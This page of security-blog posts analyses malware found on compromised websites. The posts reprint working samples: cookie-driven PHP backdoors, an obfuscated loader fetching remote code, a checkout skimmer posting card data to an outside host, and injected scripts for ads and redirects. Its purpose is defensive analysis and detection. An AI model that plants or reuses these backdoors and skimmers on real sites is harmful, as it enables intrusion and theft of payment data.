Category: Website Security

Simple $_COOKIE backdoor (variation)

There are many ways to develop a backdoor and virtually all of them share a similar goal - not to be discovered. To achieve that, some attackers are giving up on using $_POST and $_GET variables, obfuscation techniques, etc, and playing with $_COOKIE’s to execute their code remotely.


The following code is a variation sample from a relatively recent malware wave (https://labs.sucuri.net/?note=2017/03/09 0:00 described by one of our researchers, Yuliyan):

<?php /*VdJR*/if(isset($_COOKIE["uFo"]))/*VO*/{$_COOKIE["JmR"]($_COOKIE["uFo"]);/*noRM*/exit;/*uDV*/}

As you can see, it works very similarly to other backdoors that use $_POST or $_GET variables instead of $_COOKIE. In this code, you simply need to set the “uFo” and “JmR” cookies, where the “JmR” one can be “eval” while “uFo” can be the code that you want to execute.

You can also notice the random comments between the statements as an attempt to avoid detection by simple static signatures used by some anti malware solutions (those comments may vary in their content and position in the code or may not even be present). This type of injection is not limited to a particular file or directory, as during our investigation, we detected several variants scattered throughout the file system.

If your website is getting reinfected very often, there might be a backdoor somewhere and we would love to clean it for you. If you need security experts to look after your website security, let us know.

May 30, 2017 by Fernando Barbosa

Tricky malvertising injections

When a website is compromised, one of the most interesting and challenging tasks we perform is identifying all malware to prevent attackers from regaining access to the resource. They may use different type of malicious codes and techniques depending on their final objectives.


In this particular case, during the remediation process the client mentioned that his users were seeing some type of malvertising, but he couldn't replicate the issue. We investigated it further and identified the following :

  • A malicious code was injected into the theme's file :
<?php $_00022b92=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]-&gt;id))    {echo " <script language=JavaScript id=onDate ></script> <script language=JavaScript src=/media/system/js/stat000.php ></script> ";};$_00022b92=1; ?>

- It included another file "stat000.php" :

/**/    <?php
    $dnoxemvhz=chr(97)."x73"."s"."e"."r"."t";    $bckttxtt="b".chr(97)."x73"."e".chr(54)."4"."x5f"."d"."e"."x63"."x6f".chr(100).chr(101);    @$dnoxemvhz(    @$bckttxtt(    'ZXZhbCb2tSMHhQ … long base64 string ...TTlKScpKTs='));    ##########################################################    ?>    /**/    //php_off

- When decoding the file I found that it made a request to:

$url_to="h"."t".chr(116)."x70"."x3a"."x2f"."/"."x70"."x69"."x63".chr(108).chr(105)."x73"."x74".chr(112)."x72"."o"."x74".chr(101).chr(99)."x74"."x2e"."x6e".chr(101)."x74"."/"."i"."x64"."4".chr(46)."x70"."h".chr(112);

Which decodes to &ldquo;hxxp://piclistprotect.net/id4.php”  ( taken offline )

The remote server then responded with this final payload :

function tzSignature() {       var tz;       try {           var currDate = new Date();           var currTime = currDate.toString();           tz = currDate.getTimezoneOffset();           if ( (currTime.indexOf("PDT") > 0) ||                (currTime.indexOf("MDT") > 0) ||                (currTime.indexOf("CDT") > 0) ||                (currTime.indexOf("EDT") > 0) ||                (currTime.indexOf("Daylight") > 0) )               tz += 60;           tz = - tz / 60;       } catch (e) {           tz = "";       }       return tz;    }    function rsSignature() {        var rs;        try {            var rsWidth = screen.width;            var rsHeight = screen.height;            var rs = rsWidth + "x" + rsHeight;        } catch (e) {            rs = "";        }        return rs;    }    var script = document.createElement("script");    script.src="hxxp://profixsysline.net//plix/scaner.php?id=4&tz="+tzSignature()+'&rs='+rsSignature();    document.head.appendChild(script);    //document.write('<sc'+'ript type="text/javascript" src="hxxp://profixsysline.net//plix/scaner.php?id=4&tz='+i+'&rs='+rsSignature()+'"></sc'+'ript>');

- As you can see, it uses two main functions : rsSignature() that returns the screen resolution and tzSignature() that returns the timezone which the page viewer is in. It passes those parameters to the "tz" and "rs" parameters like so : "hxxp://profixsysline.net//plix/scaner.php?id=4&tz=&rs="

Conclusion :

Attackers are constantly trying to be more efficient with their injections in order to only target certain victims. This malicious code serves specific ads to different timezones. We have been remediating lots of these types of injections lately. However, our http://sitecheck.sucuri.net/ scanner detects these types of injections and will warn you if there are any issues on your site.

May 10, 2017 by Abdelli Nassereddine

Client-Side or Server-Side Script?

We’ve already described several times how credit card stealing malware hides a data collecting script behind an image URL. When people see URLs that end with .jpg, .png, or .gif they normally don’t expect them to do anything malicious. Third-party JavaScripts are much more suspicious, still it is possible to use them in a way to coax webmasters into considering them benign.

When checking yet another credit card stealing JavaScript injected into the /js/ccard.js file in Magento, we noticed this line:


e294b002686cad2df01bb59e3e2299f3e:'hxxps://informaer[.]net/js/info_jquery.js',

JS script in a malicious injection is always suspicious to us. Especially when it has the word jquery in it and some unknown domain (with a typo). When we opened that URL, the only content we found there was:

jQuery.noConflict();

NoConflict() is the function that tells jQuery library to restore the original value of the “$”, which allows you to use other JS libraries that use “$” as a function or variable name alongside with jQuery. The code is definitely benign.

But let’s check how this "informaer" URL is used by the script.

...var http=new XMLHttpRequest();http.open('POST',be20b6410993ea4c7a48767775856514b.e294b002686cad2df01bb59e3e2299f3e,true);http.setRequestHeader('Content-type','application/x-www-form-urlencoded');http.send('info='+keym+'&hostname='+domm+'&key='+be20b6410993ea4c7a48767775856514b.myid);

It turns out that the URL is actually not a static JavaScript file. It’s a server-side script that receives data from filled out checkout forms passed in the info parameter of a POST request. It’s actually the collector of the stolen data. However, if you don’t use the POST method and don’t pass correct parameters, it pretends to be a benign JavaScript. It even sets the Content-Type: application/javascript; charset=utf-8 header to make it look plausible.

Hackers may go an extra mile to make their resources look benign, but as a webmaster you should never rely on what code looks like. Instead, verify whether it belongs to your site or not by answering two questions: 1. Did I put it there? If no then 2. Is this code a part of the third-party software I installed? To answer the second question, compare it to the original third-party software (get it either directly from the developer or from your clean backup copy). If answers to both of these questions are NO then no matter how benign the code looks, most likely it was placed there as a result of the site compromise. Integrity control may help you easily identify such unauthorized code injections.

If malware detection and removal still sound too complex for you, Sucuri is here to help.

May 3, 2017 by Denis Sinegubko

Titles, Imprints and Marks Left by Attackers

Some attackers seem to like signing their scripts. This fact is especially true for defacements and backdoors, where attackers show their pride stating that they “owned” a site by signing their own malware. Sometimes they write their expressions and nicknames on the title or in the middle of the file:


<title>Ow3nd </title><center><div id=q>Your Site Has Been Ow3nd By ...

Or like in this malware sample:

<title>#Pwned</title><p> ... </p><h3> ... ownz you</h3> ...

Or even the classic one:

<title>Hacked by …

We have seen thousands of defacement title variations (and even more backdoor patterns), and still we find new variations every day.

By looking at a file's title, we may be able to tell if a file is malware. Though, most of the times, finding malware requires much deeper scanning, decryption and deobfuscation processes, making the task to be difficult and time consuming. If you don’t use such a scanning and want to make sure you didn’t miss any defacements or backdoors on your server, you can have us scan your site for thousands of different malware patterns.

Apr 18, 2017 by Jose Martinez

WebSockets, Viagra and Fake CloudFlare CDN

Recently we’ve seen some WordPress websites displaying unwanted banners at the bottom of the page which appear 15 seconds after browsing the website. Those banners are being generated due to the following code being injected into the theme’s function.php files:

function add_js_scripts() {
    wp_enqueue_script('js-rws', 'hXXp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1[.]0[.]0/reconnecting-websocket[.]js', '', null, true);
    wp_enqueue_script('js-cors', 'hXXp://cloudflare[.]solutions/ajax/libs/cors/cors[.]js', '', null, true);
}

add_action( 'wp_enqueue_scripts', 'add_js_scripts' );
add_action('admin_enqueue_scripts', 'add_js_scripts' );
add_action('login_enqueue_scripts', 'add_js_scripts' );

The code above uses WordPress core functions like wp_enqueue_script and add_action to inject external scripts into all WordPress pages (including admin and login pages).

The third-party scripts load from what looks like a CloudFlare CDN. And if you open the cloudflare[.]solutions site, you’ll see it says "This Server is part of Cloudflare Distribution Network." However, WHOIS says that the domain had been registered just on February 11, 2017 to a Russian company, Legato LLC and is now hosted in Ukraine on a server with IP 78.109.28.70.

The first injected script reconnecting-websocket.js is a copy of a legitimate ReconnectingWebSocket library. It’s not malicious. But the second injected script cors.js is more interesting. After decoding it, you may notice that it has a list of banner images saved on imgur.com image hosting.

var banners=[];
var bannercount=0;
var bannersSrc=["hXXPs://i.imgur[.]com/gXcct1z[.]jpg","hXXPs://i.imgur[.]com/FAdidSx.jpg","hXXPs://i.imgur[.]com/fGOvfDF.jpg","hXXPs://i.imgur[.]com/MjWLkNB.jpg","hXXPs://i.imgur[.]com/3On9O6O.jpg","hXXPs://i.imgur[.]com/cdBEiDU.jpg","hXXPs://i.imgur[.]com/xyKxCFG.jpg","hXXPs://i.imgur[.]com/BRSxZ96.jpg","hXXPs://i.imgur[.]com/NfyV72o.jpg","hXXPs://i.imgur[.]com/fcHTBav.jpg","hXXPs://i.imgur[.]com/5SsJqTM.jpg"];
var mobileBanners=["hXXPs://i.imgur[.]com/KRqvxk4.jpg","hXXPs://i.imgur[.]com/84mQCt4.jpg","hXXPs://i.imgur[.]com/hyblTs8[.]jpg","hXXPs://i.imgur[.]com/85tjX88.jpg"];

The script downloads the images, then waits for 15 seconds and loads them as banners that lead you to www[.]orderrealviagra[.]cc., rotating the images for every new page load. If a user clicks on the banner, or closes it (the banners have the close [x] button), the script sets the adwords-cookie-settings for the next 7 days and won’t show the banners for browsers with this cookie.

An interesting and quite rare feature of this script, is that it uses WebSocket protocol (that’s why they also inject the reconnecting-websocket.js library) instead of HTTP to communicate with its server: wss://cloudflare[.]solutions:8085 that uses a custom set of commands:

socket.send("cb*" + navigator.userAgent)
socket.send("rts*" + navigator.userAgent)
socket.send("rsbl*" + navigator.userAgent)
socket.send("msbl*" + navigator.userAgent)

Using new generic TLDs like .solutions is still quite uncommon. But not on this server. A reverse IP lookup revealed only one other site on this server (ardf[.]world) that also happen to use a new generic TLD (.world). Do these sites have the same owner or is it just a coincidence?

This case proves that malware may hide behind legit-looking URLs and you should carefully review all third-party resources that your site loads. Don’t forget that theme files are a very popular target for malware injections (the most popular for attacks that use stolen/bruteforced WordPress credentials) and you should monitor their integrity. Unauthorized changes are a strong indicator of a hack.

If you see your site showing unwanted banners or popups but can’t locate their source, you might want to have us scan your site for malware and clean it.

Apr 3, 2017 by Fernando Barbosa

doc.google.com.TROJAN

During an incident response process, we identified some files located at a website’s root folder. Although they had different filenames (post.php, news.php, home.php, etc), they had the same malicious content:


<?php$dom = array('www[.]edgefinance[.]co[.]za','www[.]capitalregioncog[.]org','contas[.]cnt[.]br','boletim[.]contas[.]cnt[.]br','www[.]capitolregionwd[.]org','bolivarcarrillo[.]udem[.]edu[.]ni','foodscience[.]keio[.]ac[.]jp','www[.]keprate[.]com','rosaliarios[.]udem[.]edu[.]ni','www[.]armd-france[.]org','luispalacios[.]udem[.]edu[.]ni','www[.]kepak[.]com','candramustika[.]unja[.]ac[.]id','appserver[.]guabiruba[.]sc[.]gov[.]br','luiscanales[.]udem[.]edu[.]ni','rawahil[.]com','avai[.]com[.]br','boletin[.]ucv[.]edu[.]pe','preview[.]table59[.]co[.]uk','jorgemendoza[.]udem[.]edu[.]ni','apps[.]timeslive[.]co[.]za','www[.]uaec[.]ufcg[.]edu[.]br','jornadasmediterraneas2014[.]atlantacongress[.]org','www[.]inmune[.]cl','www[.]dees-groep[.]nl','sporternaehrung[.]global-nutrition[.]de','www[.]afonsolopes[.]com','geomorfo[.]criba[.]edu[.]ar','wordpress[.]hockeyreno[.]com','ideation[.]attero[.]in');
$url = 'hXXp://'.$dom[mt_rand(0,sizeof($dom)-1)].'/file.php';if (strlen($_SERVER["QUERY_STRING"])>1) {$file=@file_get_contents($url.'?aaaa');header ("Content-Type: image/jpeg");echo $file;} else {header('Location: '.$url);}exit;?>

This kind of malicious code is very familiar to us. It is part of a malicious campaign where different sites are used as a redirect chain that’ll lead to the spam or malware page. This technique is used as an evasion method allowing the attacker to keep a fresh site (not blacklisted) at the end of the chain.

The code, when accessed, will test if the $_SERVER["QUERY_STRING"] is bigger than 1, meaning that if no parameter is passed, it’ll load some image from the url. However, if any parameter is passed to the  file.php, it’ll redirect the browser, proceed onto the download of a doc.google.com file, which is a trojan expected to be executed in Windows machines. You can find more information about that trojan file here.

If you are experiencing such redirects, this could be the reason why. We highly recommend checking your site against our free scanner Sitecheck, and if you need any help identifying and cleaning it up, you can let us know.

Mar 14, 2017 by Fernando Barbosa

Set your Cookie, Execute a Command

Backdoors evolve. They tend to get more complex, harder to understand and harder to decode, but this is not always the case.


Most of the backdoors rely on PHP-enabled engine options that allow execution of commands. Also, those options depend on some of the core functionalities of most of the CMS systems out there.

The case today was different. The backdoor was so tiny that by overlooking some of the file names on your website you can easily miss it.

<?php if (isset($_COOKIE["i5o8vz"])) @$_COOKIE["cmd"]($_COOKIE["i5o8vz"]);

It is a really simple, yet powerful backdoor. The attacker who placed it on your website sets his cookie so he can execute the command in the payload of the cookie, and as we know, setting a cookie is a piece of a cake. Also, $_COOKIE or $_POST variables are used as a “cloaking method” once they are not logged by default on access_logs, like $_GET, making it harder to detect anomalies when inspecting logs.

If you notice some suspicious activity on your website, or it is sending SPAM on its own, or even if you have been blacklisted by the major search engines, you can rely on us to clean and protect your website.

Mar 9, 2017 by Yuliyan Tsvetkov